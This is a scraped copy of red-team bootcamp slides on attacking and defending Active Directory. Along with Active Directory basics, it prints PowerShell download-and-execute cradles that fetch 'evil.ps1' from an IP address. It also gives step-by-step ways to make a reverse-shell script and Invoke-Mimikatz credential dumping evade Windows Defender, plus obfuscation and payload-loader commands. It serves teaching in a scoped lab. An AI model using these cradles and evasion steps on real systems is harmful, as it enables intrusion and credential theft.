0% found this document useful (0 votes)

65 views331 pages

Attacking and Defending ActiveDirectory - SlideNotes

The document outlines a beginner-friendly bootcamp focused on attacking and defending Active Directory, led by Nikhil Mittal from Altered Security. It covers various modules including attack methodologies, privilege escalation, and bypassing defenses, emphasizing practical lab exercises without the use of exploits. The course aims to teach participants how to emulate adversarial techniques using built-in tools and functionality abuse within a controlled environment.

Uploaded by

examaadi

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

65 views331 pages

Attacking and Defending ActiveDirectory - SlideNotes

Uploaded by

examaadi

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 331

Attacking and Defending Active Directory

Beginner's Edition Bootcamp

Nikhil Mittal
Altered Security: https://alteredsecurity.com/

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 1
Edition Bootcamp

Join https://t.me/offenciveSec 1
About me

• Twitter - @nikhil_mitt
• Founder of Altered Security - alteredsecurity.com
• GitHub - github.com/samratashok
• Creator of Nishang, Deploy-Deception, RACE toolkit and more
• Interested in Active Directory, Offensive PowerShell and Azure security
• Previous Talks and/or Trainings
– DEF CON, BlackHat, BruCON and more.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 2
Edition Bootcamp

Join https://t.me/offenciveSec 2
Altered Security
• Trained more than 40000 security professionals from more than 130 countries!
• Our Red Team Labs Platform enables labs to be:
– Affordable
– Easy to Access
– Stable and provide great user experience
– Fun to Solve
– Big enough to feel enterprise-like

• Red team labs - alteredsecurity.com/online-labs

• Instructor-led bootcamps - alteredsecurity.com/bootcamps
• GitHub - github.com/AlteredSecurity
• Lab Platform - enterprisesecurity.io
• Free Labs and Challenges - redlabs.enterprisesecurity.io
Attacking and Defending Active Directory - Beginner's
AlteredSecurity 3
Edition Bootcamp

Join https://t.me/offenciveSec 3
Course Content
• Module 1
– Introduction to Active Directory and Attack Methodology
– Offensive PowerShell and .NET tradecraft
– Domain Enumeration
• Module 2
– Local Privilege Escalation
– Lateral Movement
– Domain Privilege Escalation
• Module 3
– Domain Persistence
– Cross Trust Attacks
• Module 4
– Bypassing Defenses (MDE and MDI)
– Monitoring and Detections

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 4
Edition Bootcamp

Join https://t.me/offenciveSec 4
Goal

• The bootcamp is beginner friendly and assumes no previous experience with active
directory security. Although, you are expected to understand basics of Active
Directory.
• This course introduces a concept, demonstrates how an attack can be executed and
then have Learning Objective section where students can practice on the lab.
• The lab, like a real-world red team operation, forces you to use built-in tools as long
as possible and focus on functionality abuse. So, in this course, we will NOT use any
exploits and exploitation framework.
• We start from a foothold box as a normal domain user.
• Everything is not on the slides :)

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 5
Edition Bootcamp

Join https://t.me/offenciveSec 5
Word of Caution
• In scope:
– 172.16.1.0/24 - 172.16.17.0/24
• Everything else is NOT in scope.
• Attacking out of scope machines (including fellow students' machines)
may result in disqualification from the lab.
• Please do not try to access the internet from any lab machine.
• Please treat the lab network as a dangerous environment and take care
of yourself!

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 6
Edition Bootcamp

Join https://t.me/offenciveSec 6
Philosophy of the course
• We will emulate an adversary who has a foothold machine in the target
domain.
• We will not use any exploit in the class and will solely depend on abuse
of functionality and features with are rarely patched.
• We try to use the built-in tools and avoid touching disk on any target
server as long as possible. We will not use any exploitation framework in
the class.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 7
Edition Bootcamp

Join https://t.me/offenciveSec 7
Active Directory
• Directory Service used to managed Windows networks.
• Stores information about objects on the network and makes it easily
available to users and admins.
• "Active Directory enables centralized, secure management of an entire
network, which might span a building, a city or multiple locations
throughout the world."

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 8
Edition Bootcamp

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
server-2003/cc780036(v=ws.10)
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-
started/virtual-dc/active-directory-domain-services-overview

Join https://t.me/offenciveSec 8
Attacking and Defending Active Directory - Beginner's
AlteredSecurity 9
Edition Bootcamp

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
server-2003/cc780036(v=ws.10)

Join https://t.me/offenciveSec 9
Active Directory - Components
• Schema - Defines objects and their attributes.
• Query and index mechanism - Provides searching and publication of
objects and their properties.
• Global Catalog - Contains information about every object in the
directory.
• Replication Service - Distributes information across domain controllers.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 10
Edition Bootcamp

Join https://t.me/offenciveSec 10
Active Directory - Structure
• Forests, domains and organizational units (OUs) are the basic building
blocks of any active directory structure.
• A forest - which is a security
boundary - may contain
multiple domains and each
domain may contain multiple
OUs.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 11
Edition Bootcamp

Join https://t.me/offenciveSec 11
https://learn.microsoft.com/en-us/powershell/scripting/overview

Join https://t.me/offenciveSec 12
Join https://t.me/offenciveSec
PowerShell Script Execution
• Download execute cradle
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 14
Edition Bootcamp

Check out Invoke-CradleCrafter:

https://github.com/danielbohannon/Invoke-CradleCrafter

Join https://t.me/offenciveSec 14
PowerShell Detections
• System-wide transcription
• Script Block logging
• AntiMalware Scan Interface (AMSI)
• Constrained Language Mode (CLM) - Integrated with Applocker and
WDAC (Device Guard)

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 15
Edition Bootcamp

Join https://t.me/offenciveSec 15
15 ways to bypass PowerShell execution policy
https://www.netspi.com/blog/entryid/238/15-ways-to-bypass-the-powershell-
execution-policy

Join https://t.me/offenciveSec 16
PowerShell Tradecraft
• Offensive PowerShell is not dead.
• The detections depend on your target organization and if you are using
customized code.
• There are bypasses and then there are obfuscated bypasses!
• Remember, the focus of the class is Active Directory :)

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 17
Edition Bootcamp

Join https://t.me/offenciveSec 17
Bypassing PowerShell Security
• We will use Invisi-Shell (https://github.com/OmerYa/Invisi-Shell) for
bypassing the security controls in PowerShell.
• The tool hooks the .NET assemblies
(System.Management.Automation.dll and System.Core.dll) to bypass
logging
• It uses a CLR Profiler API to perform the hook.
• "A common language runtime (CLR) profiler is a dynamic link library
(DLL) that consists of functions that receive messages from, and send
messages to, the CLR by using the profiling API. The profiler DLL is
loaded by the CLR at run time."

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 18
Edition Bootcamp

https://github.com/OmerYa/Invisi-
Shell/blob/master/InvisiShellProfier/InvisiShellProfiler.cpp
https://learn.microsoft.com/en-us/dotnet/framework/unmanaged-
api/profiling/profiling-overview

Join https://t.me/offenciveSec 18
Bypassing PowerShell Security
Using Invisi-Shell
• With admin privileges:
RunWithPathAsAdmin.bat

• With non-admin privileges:

RunWithRegistryNonAdmin.bat

• Type exit from the new PowerShell session to complete the clean-up.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 19
Edition Bootcamp

Join https://t.me/offenciveSec 19
Bypassing AV Signatures for PowerShell
• We can always load scripts in memory and avoid detection using AMSI bypass.
• How do we bypass signature based detection of on-disk PowerShell scripts by Windows Defender?
• We can use the AMSITrigger (https://github.com/RythmStick/AMSITrigger) or DefenderCheck
(https://github.com/t3hbb/DefenderCheck) to identify code and strings from a binary or script that
Windows Defender may flag.

• Simply provide path to the script file to scan it:

AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1

• For full obfuscation of PowerShell scripts, see Invoke-Obfuscation

(https://github.com/danielbohannon/Invoke-Obfuscation). That is used for obfuscating the AMSI
bypass in the course!

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 20
Edition Bootcamp

More on PowerShell obfuscation - https://github.com/t3l3machus/PowerShell-

Obfuscation-Bible

Join https://t.me/offenciveSec 20
Bypassing AV Signatures for PowerShell
• Steps to avoid signature based detection are pretty simple:
1) Scan using AMSITrigger
2) Modify the detected code snippet
3) Rescan using AMSITrigger
4) Repeat the steps 2 & 3 till we get a result as “AMSI_RESULT_NOT_DETECTED” or
“Blank”

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 21
Edition Bootcamp

Join https://t.me/offenciveSec 21
Bypassing AV Signatures for PowerShell - Invoke-
PowerShellTcp
• Scan using AMSITrigger

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 22
Edition Bootcamp

Join https://t.me/offenciveSec 22
Bypassing AV Signatures for PowerShell - Invoke-
PowerShellTcp
• Reverse the "Net.Sockets" string on line number 32
$String = "stekcoS.teN"
$class = ([regex]::Matches($String,'.','RightToLeft') | ForEach
{$_.value}) -join ''
if ($Reverse)
{
$client = New-Object System.$class.TCPClient($IPAddress,$Port)
}
• Check again with AMSITrigger!

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 23
Edition Bootcamp

Join https://t.me/offenciveSec 23
Bypassing AV Signatures for PowerShell – PowerUp
– Script Modification
• Using only the minimal portion of a script is also useful.
• We can remove the part of a script that is getting detected but is not
used.
• For this we can scan the script with DefenderCheck and then use the
ByteToLineNumber.ps1 script in the C:\AD\Tools folder.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 24
Edition Bootcamp

Join https://t.me/offenciveSec 24
Bypassing AV Signatures for PowerShell – PowerUp
– Script Modification
• Scan using DefenderCheck
• Here, we can see the
detection part is at the
offset 0x1DCD2.
• We can find the line number
of the detected part using
ByteToLineNumber.ps1
script

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 25
Edition Bootcamp

Join https://t.me/offenciveSec 25
Bypassing AV Signatures for PowerShell – PowerUp
– Script Modification
• Running the script, we find the line number for the detected
offset is 1984.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 26
Edition Bootcamp

Join https://t.me/offenciveSec 26
Bypassing AV Signatures for PowerShell – PowerUp
– Script Modification
• Navigate to line 2640 in any
text editor, we see that it is
the start of a base64
encoded binary, which is
getting detected.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 27
Edition Bootcamp

Join https://t.me/offenciveSec 27
Bypassing AV Signatures for PowerShell – PowerUp
– Script Modification
• Scrolling up, we see the
binary is used in the
function "Write-
ServiceBinary".
• We can delete the base64
encoded binary that is
getting detected or remove
the entire function.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 28
Edition Bootcamp

Join https://t.me/offenciveSec 28
Bypassing AV Signatures for PowerShell - PowerUp
• Check the script after removing the detected portion and it would be
marked safe!

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 29
Edition Bootcamp

Join https://t.me/offenciveSec 29
Bypassing AV Signatures for PowerShell - Invoke-
Mimikatz
• Invoke-Mimikatz is THE most heavily signature PowerShell script!
• We must rename it before scanning with AmsiTrigger or we get an access denied.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 30
Edition Bootcamp

Join https://t.me/offenciveSec 30
Bypassing AV Signatures for PowerShell - Invoke-
Mimikatz
• There are multiple detections. We need to make the following changes:
1. Remove default comments.
2. Rename the script, function names and variables.
3. Modify the variable names of the Win32 API calls that are detected.
4. Obfuscate PEBytes content → PowerKatz dll using packers.
5. Implement a reverse function for PEBytes to avoid any static signatures.
6. Add a sandbox check to waste dynamic analysis resources.
7. Remove Reflective PE warnings for a clean output.
8. Use obfuscated commands for Invoke-MimiEx execution.
9. Analysis using DefenderCheck.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 31
Edition Bootcamp

Join https://t.me/offenciveSec 31
Bypassing AV Signatures for PowerShell - Invoke-
Mimikatz
1. Remove all default embedded comments such as follows:

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 32
Edition Bootcamp

Join https://t.me/offenciveSec 32
Bypassing AV Signatures for PowerShell - Invoke-
Mimikatz
2. Rename the script and Invoke-Mimikatz function to Invoke-Mimi and
replace variables such as DumpCreds to something like DC.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 33
Edition Bootcamp

Join https://t.me/offenciveSec 33
Bypassing AV Signatures for PowerShell - Invoke-
Mimikatz
3. Modify the variable names of the Win32 API calls that are detected -
"VirtualProtect", WriteProcessMemroy" and "CreateRemoteThread"

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 34
Edition Bootcamp

Join https://t.me/offenciveSec 34
Bypassing AV Signatures for PowerShell - Invoke-
Mimikatz
4. Even if all static signatures are
avoided, PEBytes content
(base64 encodedPowerKatz dll)
is still detected by AMSI after
execution.

Rebuild a powerkatz dll from

Mimikatz source and use
ProtectMyTooling to obfuscate
the powerkatz dll as shown.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 35
Edition Bootcamp

ProtectMyTooling: https://github.com/mgeeky/ProtectMyTooling

Join https://t.me/offenciveSec 35
Bypassing AV Signatures for PowerShell - Invoke-
Mimikatz
5. Convert the powerkatz dll into base64 and next reverse the string and use it as
PEBytes64rev.
Finally implement code to reverse this string for execution to bypass static detections.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 36
Edition Bootcamp

Join https://t.me/offenciveSec 36
Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
$EvidenceOfSandbox = New-Object System.Collections.ArrayList

6. Add a sandbox check $FilePathsToCheck = 'C:\windows\System32\Drivers\Vmmouse.sys’,

'C:\windows\System32\Drivers\vm3dgl.dll', 'C:\windows\System32\Drivers\vmdum.dll’,
to waste dynamic 'C:\windows\System32\Drivers\vm3dver.dll', 'C:\windows\System32\Drivers\vmtray.dll’,
'C:\windows\System32\Drivers\vmci.sys', 'C:\windows\System32\Drivers\vmusbmouse.sys’,
analysis resources and 'C:\windows\system32\Drivers\vmx_svga.sys', 'C:\windows\system32\Drivers\vmxnet.sys’,
'C:\windows\System32\Drivers\VMToolsHook.dll', 'C:\windows\System32\Drivers\vmhgfs.dll’,
'C:\windows\System32\Drivers\vmmousever.dll', 'C:\windows\System32\Drivers\vmGuestLib.dll’,
avoid detection after 'C:\windows\System32\Drivers\VmGuestLibJava.dll', 'C:\windows\System32\Drivers\vmscsi.sys’,
'C:\windows\System32\Drivers\VBoxMouse.sys', 'C:\windows\System32\Drivers\VBoxGuest.sys’,
execution. 'C:\windows\System32\Drivers\VBoxSF.sys', 'C:\windows\System32\Drivers\VBoxVideo.sys’

ForEach ($FilePath in $FilePathsToCheck) {

if (Test-Path $FilePath) {
[void]$EvidenceOfSandbox.Add($FilePath)
We are targeting VMware and }
}
VirtualBox in the example.
if ($EvidenceOfSandbox.count -eq 0) {
} else {
Write-Output "The following files on disk suggest we are running in a sandbox. Caution!."
$EvidenceOfSandbox
}

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 37
Edition Bootcamp

Join https://t.me/offenciveSec
Bypassing AV Signatures for PowerShell - Invoke-Mimikatz

7. Remove Warnings for a clean output by deleting this line in script:

Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try
restarting PowerShell and trying again" -WarningAction Continue

• Next remove IntPtr and other errors by adding:

ErrorActionPreference = "silentlycontinue"

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 38
Edition Bootcamp

Join https://t.me/offenciveSec
Bypassing AV Signatures for PowerShell - Invoke-Mimikatz

8. For safe Invoke-MimiEx execution for a command such as sekurlsa::ekeys append an

obfuscated command to the end of the script as follows:
$j = “yS“
$i = “E“
$h = “k“
$g = “E“
$f = “::“
$e = “a“
$d = “lS“
$c = “r“
$b = “EKu“
$a = “s“

$Pwn = $a + $b + $c + $d + $e + $f + $g + $h + $i + $j

Invoke-Mimi -Command $Pwn

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 39
Edition Bootcamp

Join https://t.me/offenciveSec
Bypassing AV Signatures for PowerShell - Invoke-Mimikatz

9. Finally, analyzing the scripts for any further detections we find that both Invoke-
Mimi and Invoke-MimiEx now remain undetected.
C:\AD\Tools\DefenderCheck> .\DefenderCheck.exe C:\AD\Tools\Invoke-Mimi.ps1
[+] No threat found in submitted file!

C:\AD\Tools\DefenderCheck> .\DefenderCheck.exe C:\AD\Tools\Invoke-MimiEx.ps1

[+] No threat found in submitted file!

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 40
Edition Bootcamp

Join https://t.me/offenciveSec
Offensive .NET - Introduction
• Currently, .NET lacks some of the security features implemented in
System.Management.Automation.dll.
• Because of this, many Red teams have included .NET in their tradecraft.
• There are many open source Offensive .NET tools and we will use the
ones that fit our attack methodology.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 41
Edition Bootcamp

A repo of popular Offensive C# tools - https://github.com/Flangvik/SharpCollection

Join https://t.me/offenciveSec 41
Offensive .NET - Tradecraft
• When using .NET (or any other compiled language) there are some challenges
– Detection by countermeasures like AV, EDR etc.
– Delivery of the payload (Recall PowerShell's sweet download-execute
cradles)
– Detection by logging like process creation logging, command line logging
etc.
• We will try and address the AV detection and delivery of the payload as and
when required during the class ;)
• You are on your own when the binaries that we share start getting detected
by Windows Defender!
Attacking and Defending Active Directory - Beginner's
AlteredSecurity 42
Edition Bootcamp

Join https://t.me/offenciveSec 42
Offensive .NET - Tradecraft - AV bypass
• We will focus mostly on bypass of signature-based detection by
Windows Defender.
• For that, we can use techniques like Obfuscation, String Manipulation
etc.
• We can again use DefenderCheck to identify code and strings from a
binary that Windows Defender may flag.
• This helps us in deciding on modifying the source code and minimal
obfuscation.
• We can also use source code obfuscation.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 43
Edition Bootcamp

Join https://t.me/offenciveSec 43
Offensive .NET - Tradecraft - AV bypass – Source
Code Obfuscation
• Tools such as Codecepticon (https://github.com/Accenture/Codecepticon) can also
obfuscate the source code to bypass any signature-related detection.
• Codecepticon needs to be compiled in Visual Studio and it’s command line
generator can help generate an obfuscation command quickly.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 44
Edition Bootcamp

Join https://t.me/offenciveSec 44
Offensive .NET - Tradecraft - AV bypass - Source
Code Obfuscation
• Compile the project in Visual Studio and navigate to the output directory, to open
the CommandLineGenerator.html file.
• Here, you can decide how you want to obfuscate the source code.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 45
Edition Bootcamp

Join https://t.me/offenciveSec 45
Offensive .NET - Tradecraft - AV bypass - Source
Code Obfuscation
• You can also use the following command to obfuscate the source code with
Codecepticon:
C:\AD\Tools\Codecepticon.exe --action obfuscate --module csharp --verbose -
-path "C:\AD\Tools\Rubeus-master\Rubeus.sln" --map-file "
C:\AD\Tools\Rubeus-master\Mapping.html" --profile rubeus --rename ncefpavs
--rename-method markov --markov-min-length 3 --markov-max-length 10 --
markov-min-words 3 --markov-max-words 5 --string-rewrite --string-rewrite-
method xor

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 46
Edition Bootcamp

Join https://t.me/offenciveSec 46
Offensive .NET - Tradecraft - AV bypass - Source
Code Obfuscation
• With the command, Codecepticon will obfuscate everything in the .NET source code
of the Rubeus project:

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 47
Edition Bootcamp

Join https://t.me/offenciveSec 47
Offensive .NET - Tradecraft - AV bypass - Source
Code Obfuscation
• If you now open up the project in Visual Studio, all the
structs/enums/parameters/variables/etc, will have been renamed.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 48
Edition Bootcamp

Join https://t.me/offenciveSec 48
Offensive .NET - Tradecraft - AV bypass - ConfuserEx
• A great tool to obfuscate the compiled binary is ConfuserEx
(https://mkaring.github.io/ConfuserEx/)
• ConfuserEx is a free .NET obfuscator, which can stop AVs from performing signature
based detection.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 49
Edition Bootcamp

Join https://t.me/offenciveSec 49
Offensive .NET - Tradecraft - AV bypass - ConfuserEx
• Run ConfuserEx GUI from C:\AD\Tools directory.
• Add the Release folder of the compiled binary to ConfuserEx

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 50
Edition Bootcamp

Join https://t.me/offenciveSec 50
Offensive .NET - Tradecraft - AV bypass - ConfuserEx
• Download ConfuserEx GUI from the “Releases” page and simply run it.
• Add the Release folder of the compiled binary to ConfuserEx

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 51
Edition Bootcamp

Join https://t.me/offenciveSec 51
Offensive .NET - Tradecraft - AV bypass - ConfuserEx
• Add a new Rule in the settings page
• Double click the rule and set the preset to “Maximum”

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 52
Edition Bootcamp

Join https://t.me/offenciveSec 52
Offensive .NET - Tradecraft - AV bypass - ConfuserEx
• Finally, in the protect page, click "Protect: to produce the obfuscated binary.
• Verify with DefenderCheck.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 53
Edition Bootcamp

Join https://t.me/offenciveSec 53
Offensive .NET - Tradecraft - Payload Delivery
• We can use NetLoader (https://gist.github.com/Arno0x/2b223114a726be3c5e7a9cacd25053a2) to
deliver our binary payloads.

• It can be used to load binary from filepath or URL and patch AMSI & ETW
while executing.
C:\Users\Public\Loader.exe -path
http://172.16.100.X/SafetyKatz.exe

• We are using NetLoader with CsWhispers project to add D/Invoke and indirect
syscall execution as NetLoader uses classic Process Injection WinAPIs which is
flagged on basic import table analysis.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 54
Edition Bootcamp

CsWhispers - https://github.com/rasta-mouse/CsWhispers
Original NetLoader - https://github.com/Flangvik/NetLoader

Join https://t.me/offenciveSec 54
Offensive .NET - Tradecraft - Payload Delivery
Steps to use Loader with CsWhispers:
1. Download CsWhispers, open it in Visual Studio and Check 'Allow unsafe code'
under build configuration.
2. Create a new file called CsWhispers.txt under CsWhispers.Sample and append
NT API and struct equivalents that are required to be replaced in the NetLoader
project.
3. Finally, append the NetLoader project into CSWhispers.Sample and replace
appropriate WinAPIs with their NT equivalents. Build the solution.
4. Obfuscate the generated assembly using Nimcrypt2.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 55
Edition Bootcamp

Join https://t.me/offenciveSec 55
Offensive .NET - Tradecraft - Payload Delivery
Steps to use Loader with CsWhispers:
1. Download CsWhispers, open it in Visual Studio and Check 'Allow unsafe code'
under build configuration..

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 56
Edition Bootcamp

Join https://t.me/offenciveSec 56
Offensive .NET - Tradecraft - Payload Delivery
Steps to use Loader with CsWhispers:
2. Create a new file called CsWhispers.txt under CsWhispers.Sample and append
NT API and struct equivalents that are required to be replaced in the NetLoader
project.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 57
Edition Bootcamp

Join https://t.me/offenciveSec 57
Offensive .NET - Tradecraft - Payload Delivery
Steps to use Loader with CsWhispers:
3. Finally, append the NetLoader project into CSWhispers.Sample and replace
appropriate WinAPIs with their NT equivalents. An example replacement for the
VirtualProtect WINAPI can be found below. Build the solution.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 58
Edition Bootcamp

Join https://t.me/offenciveSec 58
Offensive .NET - Tradecraft - Payload Delivery
Steps to use Loader with CsWhispers:
4. Obfuscate the generated assembly using Nimcrypt2.
kali> ./nimcrypt -f CSWhispers.Sample.exe -e -n -s --no-ppid-spoof -o Loader.exe -t csharp

-e: Encrypt strings using the strenc module

-n: Disable syscall name randomization
-s: Disable sandbox checks
--no-ppid-spoof: Disable PPID Spoofing
-t: Type of file
-o: Output filename

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 59
Edition Bootcamp

Join https://t.me/offenciveSec 59
Methodology - Assume Breach

"It is more likely that an organization has already been compromised, but just
hasn't discovered it yet."

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 60
Edition Bootcamp

Microsoft Cloud Red Teaming Paper:

https://download.microsoft.com/download/C/1/9/C1990DBA-502F-4C2A-848D-
392B93D9B9C3/Microsoft_Enterprise_Cloud_Red_Teaming.pdf

Join https://t.me/offenciveSec 60
Methodology - Assume Breach
• Insider Attack Simulation is an important part of the Assume Breach
Execution Cycle.
• In this class, we are going to use the Assume Breach Methodology on an
Active Directory Environment and use internal access available with an
adversary to perform further attacks.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 61
Edition Bootcamp

Join https://t.me/offenciveSec 61
Attack Methodology

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 62
Edition Bootcamp

Join https://t.me/offenciveSec 62
The Lab Environment
• The target Active Directory environment is of a fictional financial
services company called 'moneycorp'.
• Moneycorp has
− Fully patched Server 2022 machines with Windows Defender.
− Server 2016 Forest Functional Level.
− Multiple forests and multiple domains.
• Minimal firewall usage so that we focus more on concepts.
• Logon to https://adlab.enterprisesecurity.io for accessing the lab

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 63
Edition Bootcamp

Join https://t.me/offenciveSec 63
The Lab Environment

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 64
Edition Bootcamp

Join https://t.me/offenciveSec 64
Domain Enumeration

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 65
Edition Bootcamp

Join https://t.me/offenciveSec 65
Domain Enumeration
• For enumeration we can use the following tools
− The ActiveDirectory PowerShell module (MS signed and works even in PowerShell CLM)
https://learn.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps
https://github.com/samratashok/ADModule

Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

− BloodHound (C# and PowerShell Collectors)

https://github.com/BloodHoundAD/BloodHound

− PowerView (PowerShell)
https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1

. C:\AD\Tools\PowerView.ps1

− SharpView (C#) - Doesn't support filtering using Pipeline

https://github.com/tevora-threat/SharpView/

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 66
Edition Bootcamp

https://janikvonrotz.ch/2015/09/09/deploy-powershell-activedirectory-module-
without-installing-the-remote-server-tools/
https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-
PowerShell-CLM.html

Join https://t.me/offenciveSec 66
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
https://www.netspi.com/blog/technical-blog/network-pentesting/powerhuntshares-
2-0-release

Join https://t.me/offenciveSec
